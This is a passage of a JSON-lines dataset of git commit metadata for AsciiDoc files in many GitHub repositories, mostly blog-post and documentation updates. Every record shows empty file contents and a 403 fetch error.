20161110-1328-have-fun.adoc","message":"Publish 20161110-1328-have-fun.adoc","repos":"angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io","old_file":"20161110-1328-have-fun.adoc","new_file":"20161110-1328-have-fun.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/angilent\/angilent.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b1b6985da1a6b4b8dbb156d12934b4804b95265","subject":"y2b create post It's My Favorite Smartphone Accessory (Seriously)","message":"y2b create post It's My Favorite Smartphone Accessory (Seriously)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-08-11-Its-My-Favorite-Smartphone-Accessory-Seriously.adoc","new_file":"_posts\/2017-08-11-Its-My-Favorite-Smartphone-Accessory-Seriously.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4accc5bf1d09d29dd6f10cfaee8e39f24ca8b484","subject":"Update 2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","message":"Update 2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","new_file":"_posts\/2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bef48796da20e6e0b24cd8629352eef699fcf3a6","subject":"Updated instalation instructions after installing on Mac","message":"Updated instalation instructions after installing on Mac\n\nRemoved phantomjs instructions\r\nAdded the step to compile messages\r\nAdapted the text to consider the new fixtures files","repos":"uclouvain\/OSIS-Louvain,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/osis_louvain,uclouvain\/osis_louvain,uclouvain\/osis,uclouvain\/osis,uclouvain\/osis,uclouvain\/osis_louvain,uclouvain\/OSIS-Louvain","old_file":"doc\/technical-manual.adoc","new_file":"doc\/technical-manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"45a373b61e3551b805c62caa94780a49230212e0","subject":"JUnit init","message":"JUnit init\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"JUnit.adoc","new_file":"JUnit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"df9c4e1ad590c4567d887ae7e28192e76b823fd0","subject":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","message":"Update 
2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","new_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d434e63ed58dd589f77860d65275f3628adf8d2d","subject":"Fix an error in docs\/schema_design.adoc","message":"Fix an error in docs\/schema_design.adoc\n\nChange-Id: Ie95df5e3a732d4e78df334f36025a44436dc9447\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/1308\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@cloudera.com>\nTested-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@cloudera.com>\n","repos":"InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu","old_file":"docs\/schema_design.adoc","new_file":"docs\/schema_design.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"777970c877ecf61766c941f3302a235ec78a62e8","subject":"Add Common Lisp notes","message":"Add Common Lisp notes\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"fdccbf76114859b4764de0ee3c1810620af89c29","subject":"More on pathnames","message":"More on pathnames\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"af8db4f254afbd99aa4b090dcc3debbaa52700a4","subject":"Create Deeper\/testchapter2.adoc","message":"Create Deeper\/testchapter2.adoc","repos":"JClingo\/gitbook,JClingo\/gitbook,JClingo\/gitbook,JClingo\/gitbook,JClingo\/gitbook,JClingo\/gitbook","old_file":"Deeper\/testchapter2.adoc","new_file":"Deeper\/testchapter2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JClingo\/gitbook.git\/': The requested URL returned error: 
403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"2705f6109d2dd12fe37113dcc3ed1fc30099d3b2","subject":"Update 2016-12-23-Larastudy.adoc","message":"Update 2016-12-23-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-23-Larastudy.adoc","new_file":"_posts\/2016-12-23-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"00935200deb2a4f754acfe9e19c8da50a93ccdec","subject":"Update installation-guide-repositories-elasticsearch.adoc","message":"Update installation-guide-repositories-elasticsearch.adoc","repos":"gravitee-io\/gravitee-docs,gravitee-io\/gravitee-docs,gravitee-io\/gravitee-docs","old_file":"pages\/apim\/installation-guide\/installation-guide-repositories-elasticsearch.adoc","new_file":"pages\/apim\/installation-guide\/installation-guide-repositories-elasticsearch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5e5286541ffdb9f75bb40500c5c72042c184d9b9","subject":"y2b create post 3 Cool Tech Deals - #11","message":"y2b create post 3 Cool Tech Deals - #11","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-11-15-3-Cool-Tech-Deals--11.adoc","new_file":"_posts\/2015-11-15-3-Cool-Tech-Deals--11.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5b26616665e36ca574a5ba60eb7937a24f6c15ad","subject":"Update 2016-07-22-Stable-Graph-Matching.adoc","message":"Update 2016-07-22-Stable-Graph-Matching.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0923004027d4ca9e18adb21fc79df23c7e9c57ce","subject":"Update 2017-07-14-Pepper.adoc","message":"Update 2017-07-14-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-14-Pepper.adoc","new_file":"_posts\/2017-07-14-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f2c4810f2bcf6050d444edd11ac59b378264041e","subject":"Update 2016-08-31-Messing-around-with-markdown.adoc","message":"Update 
2016-08-31-Messing-around-with-markdown.adoc","repos":"crisgoncalves\/crisgoncalves.github.io,crisgoncalves\/crisgoncalves.github.io,crisgoncalves\/crisgoncalves.github.io,crisgoncalves\/crisgoncalves.github.io","old_file":"_posts\/2016-08-31-Messing-around-with-markdown.adoc","new_file":"_posts\/2016-08-31-Messing-around-with-markdown.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crisgoncalves\/crisgoncalves.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"456cfeb76653acefa5d82258720cf15aac3fe616","subject":"Create README.asciidoc","message":"Create README.asciidoc","repos":"TweetWallFX\/TweetwallFX,mklaehn\/TweetwallFX,reinhapa\/TweetwallFX,fvogler\/TweetwallFX,jmichelberger\/TweetwallFX,Map8524\/TweetwallFX,svenreimers\/TweetwallFX","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/reinhapa\/TweetwallFX.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"39f6ec0cdd7c6d857b8e68df7034bb323c716288","subject":"Publish 2016-08-09.adoc","message":"Publish 2016-08-09.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-08-09.adoc","new_file":"2016-08-09.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a066bb9dc02d56bbeb2043d87e7133248af772c7","subject":"Update 2017-01-12-Quick-Tips-1-Centralizando-Elementos.adoc","message":"Update 2017-01-12-Quick-Tips-1-Centralizando-Elementos.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2017-01-12-Quick-Tips-1-Centralizando-Elementos.adoc","new_file":"_posts\/2017-01-12-Quick-Tips-1-Centralizando-Elementos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bfd5f55e4dc40884b0c7aaa7fcf603d22c945c5d","subject":"add the instructions to create the .po file","message":"add the instructions to create the .po file\n","repos":"savoirfairelinux\/sous-chef,savoirfairelinux\/sous-chef,madmath\/sous-chef,savoirfairelinux\/santropol-feast,savoirfairelinux\/santropol-feast,madmath\/sous-chef,madmath\/sous-chef,savoirfairelinux\/santropol-feast,savoirfairelinux\/sous-chef","old_file":"docs\/create_po_file.adoc","new_file":"docs\/create_po_file.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/savoirfairelinux\/sous-chef.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"8b10c2fece805dd35b7396526ee0a09b8fee91c7","subject":"doc: implguide: add sections on typedefs and abi coniderations","message":"doc: implguide: add sections on typedefs and abi coniderations\n\nSigned-off-by: Bill Fischofer <52f3c909d51cc5d355a68a403df6906b3c1a8f83@linaro.org>\nReviewed-by: Mike Holmes <ed44c09f4d7f698f5510adc894a872c73e08c8bd@linaro.org>\nSigned-off-by: Maxim Uvarov 
<db4d16e02ae2d7493db430203537da8b2e34f290@linaro.org>\n","repos":"dkrot\/odp,ravineet-singh\/odp,nmorey\/odp,erachmi\/odp,nmorey\/odp,nmorey\/odp,mike-holmes-linaro\/odp,nmorey\/odp,mike-holmes-linaro\/odp,ravineet-singh\/odp,erachmi\/odp,dkrot\/odp,dkrot\/odp,dkrot\/odp,erachmi\/odp,ravineet-singh\/odp,mike-holmes-linaro\/odp,mike-holmes-linaro\/odp,ravineet-singh\/odp,erachmi\/odp","old_file":"doc\/implementers-guide\/implementers-guide.adoc","new_file":"doc\/implementers-guide\/implementers-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nmorey\/odp.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"71093728adc5f2caf0bd701802c7ea598809943f","subject":"Update 2015-04-15-titre-du-post.adoc","message":"Update 2015-04-15-titre-du-post.adoc","repos":"yoanndupuy\/yoanndupuy.github.io,yoanndupuy\/yoanndupuy.github.io,yoanndupuy\/yoanndupuy.github.io","old_file":"_posts\/2015-04-15-titre-du-post.adoc","new_file":"_posts\/2015-04-15-titre-du-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yoanndupuy\/yoanndupuy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cd193e45a10e11f10bdcc271e0314bf3f2e1cd48","subject":"Update 2018-11-28-vr-programing.adoc","message":"Update 2018-11-28-vr-programing.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-28-vr-programing.adoc","new_file":"_posts\/2018-11-28-vr-programing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7f2dd430d9ff00661ad724edb465489fd7683812","subject":"Explains public view of the table.","message":"Explains public view of the table.\n","repos":"CityOfNewYork\/NYCOpenRecords,CityOfNewYork\/NYCOpenRecords,CityOfNewYork\/NYCOpenRecords,CityOfNewYork\/NYCOpenRecords,CityOfNewYork\/NYCOpenRecords","old_file":"docs\/publictable.adoc","new_file":"docs\/publictable.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CityOfNewYork\/NYCOpenRecords.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a8ebfc93c06ea297a585704eeddc19c53635b2a8","subject":"Update 2016-04-06-Primer-post.adoc","message":"Update 2016-04-06-Primer-post.adoc","repos":"crimarde\/crimarde.github.io,crimarde\/crimarde.github.io,crimarde\/crimarde.github.io,crimarde\/crimarde.github.io","old_file":"_posts\/2016-04-06-Primer-post.adoc","new_file":"_posts\/2016-04-06-Primer-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crimarde\/crimarde.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2bef8ff8022e73441c7456b4968681582f2ae3be","subject":"Update 2016-07-24-Tiago-Alves.adoc","message":"Update 
2016-07-24-Tiago-Alves.adoc","repos":"cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io","old_file":"_posts\/2016-07-24-Tiago-Alves.adoc","new_file":"_posts\/2016-07-24-Tiago-Alves.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cegohub\/cegohub.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4a0afe84e86efc5bf028b42735bd313ece0acd81","subject":"Update 2017-01-14-Hello-World.adoc","message":"Update 2017-01-14-Hello-World.adoc","repos":"plaidshirtguy\/plaidshirtguy.github.io,plaidshirtguy\/plaidshirtguy.github.io,plaidshirtguy\/plaidshirtguy.github.io,plaidshirtguy\/plaidshirtguy.github.io","old_file":"_posts\/2017-01-14-Hello-World.adoc","new_file":"_posts\/2017-01-14-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/plaidshirtguy\/plaidshirtguy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1aaf588b377c04f901887a782816c9ec68593097","subject":"Update 2018-05-02-Azure-11.adoc","message":"Update 2018-05-02-Azure-11.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-02-Azure-11.adoc","new_file":"_posts\/2018-05-02-Azure-11.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bd2a1c1e446db4c45045dcf3f098e058230be7cd","subject":"Update 2018-09-04-vr-comic.adoc","message":"Update 2018-09-04-vr-comic.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-04-vr-comic.adoc","new_file":"_posts\/2018-09-04-vr-comic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"499253b9a4e77d67e89e050c2f5c871ccc6a4b2a","subject":"y2b create post Unboxing My Ultimate McDonald's Burger...","message":"y2b create post Unboxing My Ultimate McDonald's Burger...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-11-29-Unboxing-My-Ultimate-McDonalds-Burger.adoc","new_file":"_posts\/2016-11-29-Unboxing-My-Ultimate-McDonalds-Burger.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9fb5cd928205c878ecf9978758ee3cfc5b204a2d","subject":"Update 2017-05-09-Army-Obligation-Complete.adoc","message":"Update 
2017-05-09-Army-Obligation-Complete.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2017-05-09-Army-Obligation-Complete.adoc","new_file":"_posts\/2017-05-09-Army-Obligation-Complete.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"25f2fabcd47eb6a273ff366b4080f933248d458c","subject":"add missing tools overview page","message":"add missing tools overview page\n","repos":"clojure\/clojurescript-site","old_file":"content\/tools\/tools.adoc","new_file":"content\/tools\/tools.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojurescript-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"b2d7a88a16e7bf0d20140dee2fb1327a2d48bc0e","subject":"y2b create post The $25,000 Mac Pro Workstation (2013)","message":"y2b create post The $25,000 Mac Pro Workstation (2013)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-10-27-The-25000-Mac-Pro-Workstation-2013.adoc","new_file":"_posts\/2013-10-27-The-25000-Mac-Pro-Workstation-2013.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5743858dfa7cd6f739746ea7f4cc6c811ad3fad0","subject":"y2b create post INSANELY HUGE Gadget Giveaway!","message":"y2b create post INSANELY HUGE Gadget Giveaway!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-01-29-INSANELY-HUGE-Gadget-Giveaway.adoc","new_file":"_posts\/2012-01-29-INSANELY-HUGE-Gadget-Giveaway.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"57eaaf8fe06c32bc0f7e262090a56fd5fadd00c4","subject":"Update 2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","message":"Update 2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","new_file":"_posts\/2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6350620348b3eb4cbb1eee088b0f43c852c55fbb","subject":"y2b create post WATCH DOGS PRANK (Real Life Street Hack)","message":"y2b create post WATCH DOGS PRANK (Real Life Street 
Hack)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-05-16-WATCH-DOGS-PRANK-Real-Life-Street-Hack.adoc","new_file":"_posts\/2014-05-16-WATCH-DOGS-PRANK-Real-Life-Street-Hack.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1e1115b43b4cc50d64d0dd00f3b9d7ea774b8178","subject":"Add build status","message":"Add build status\n","repos":"rodm\/teamcity-gradle-init-scripts-plugin,rodm\/teamcity-gradle-init-scripts-plugin,rodm\/teamcity-gradle-init-scripts-plugin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rodm\/teamcity-gradle-init-scripts-plugin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cdabcebefe88c5b0d2c6a886f3fe2db95dc96b06","subject":"\u30c9\u30ad\u30e5\u30e1\u30f3\u30c8\u3092\u8ffd\u8a18","message":"\u30c9\u30ad\u30e5\u30e1\u30f3\u30c8\u3092\u8ffd\u8a18\n","repos":"eighttails\/PC6001VX,eighttails\/PC6001VX,eighttails\/PC6001VX,eighttails\/PC6001VX,eighttails\/PC6001VX,eighttails\/PC6001VX","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eighttails\/PC6001VX.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"dce46644540732d2bbe23ca0a40d2685507191f9","subject":"Update 2017-11-20-A-Beginners-Guide-to-Learning-Concepts.adoc","message":"Update 2017-11-20-A-Beginners-Guide-to-Learning-Concepts.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2017-11-20-A-Beginners-Guide-to-Learning-Concepts.adoc","new_file":"_posts\/2017-11-20-A-Beginners-Guide-to-Learning-Concepts.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0f829748ab89448a2365826d1c2e8c713e50aa0f","subject":"add example with volume","message":"add example with volume\n","repos":"adoc-editor\/editor-backend","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adoc-editor\/editor-backend.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"31e62fa9acaa11cd5a368239a5cf0031df9186c3","subject":"Convert README.md to Asciidoc, add deprecation warnings","message":"Convert README.md to Asciidoc, add deprecation warnings\n","repos":"jenkinsci\/pipeline-maven-plugin,netceler\/pipeline-maven-plugin,jenkinsci\/pipeline-maven-plugin,netceler\/pipeline-maven-plugin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jenkinsci\/pipeline-maven-plugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d14d89e56630303c13ec41336fa4d5a8ba91226a","subject":"Update 2015-06-02-title.adoc","message":"Update 
2015-06-02-title.adoc","repos":"yysk\/yysk.github.io,yysk\/yysk.github.io,yysk\/yysk.github.io","old_file":"_posts\/2015-06-02-title.adoc","new_file":"_posts\/2015-06-02-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yysk\/yysk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"179cb1c6019d7252b88e9cb2b064f4a9a72b6aba","subject":"Updated doc\/Z-PLUGINS.adoc","message":"Updated doc\/Z-PLUGINS.adoc\n","repos":"psprint\/zplugin,psprint\/zplugin,psprint\/zplugin","old_file":"doc\/Z-PLUGINS.adoc","new_file":"doc\/Z-PLUGINS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/psprint\/zplugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3743d2ed0d84690147e846c0e9fd542963a754a6","subject":"Renamed '_posts\/2018-01-09-Whats-up-Flutter-January-2018.adoc' to '_posts\/2019-01-29-Whats-up-Flutter-January-2018.adoc'","message":"Renamed '_posts\/2018-01-09-Whats-up-Flutter-January-2018.adoc' to '_posts\/2019-01-29-Whats-up-Flutter-January-2018.adoc'","repos":"triskell\/triskell.github.io,triskell\/triskell.github.io,triskell\/triskell.github.io,triskell\/triskell.github.io","old_file":"_posts\/2019-01-29-Whats-up-Flutter-January-2018.adoc","new_file":"_posts\/2019-01-29-Whats-up-Flutter-January-2018.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/triskell\/triskell.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"797bbddfc9cebb26c5a2ef4ce9ba63e41c80be52","subject":"added domain intro section","message":"added domain intro section\n","repos":"sergehuber\/contextserver-graphql-api","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sergehuber\/contextserver-graphql-api.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e06587724f12ea08beac3f8ab08985efba425803","subject":"Update 2015-05-17-Uber-das-Vergessen.adoc","message":"Update 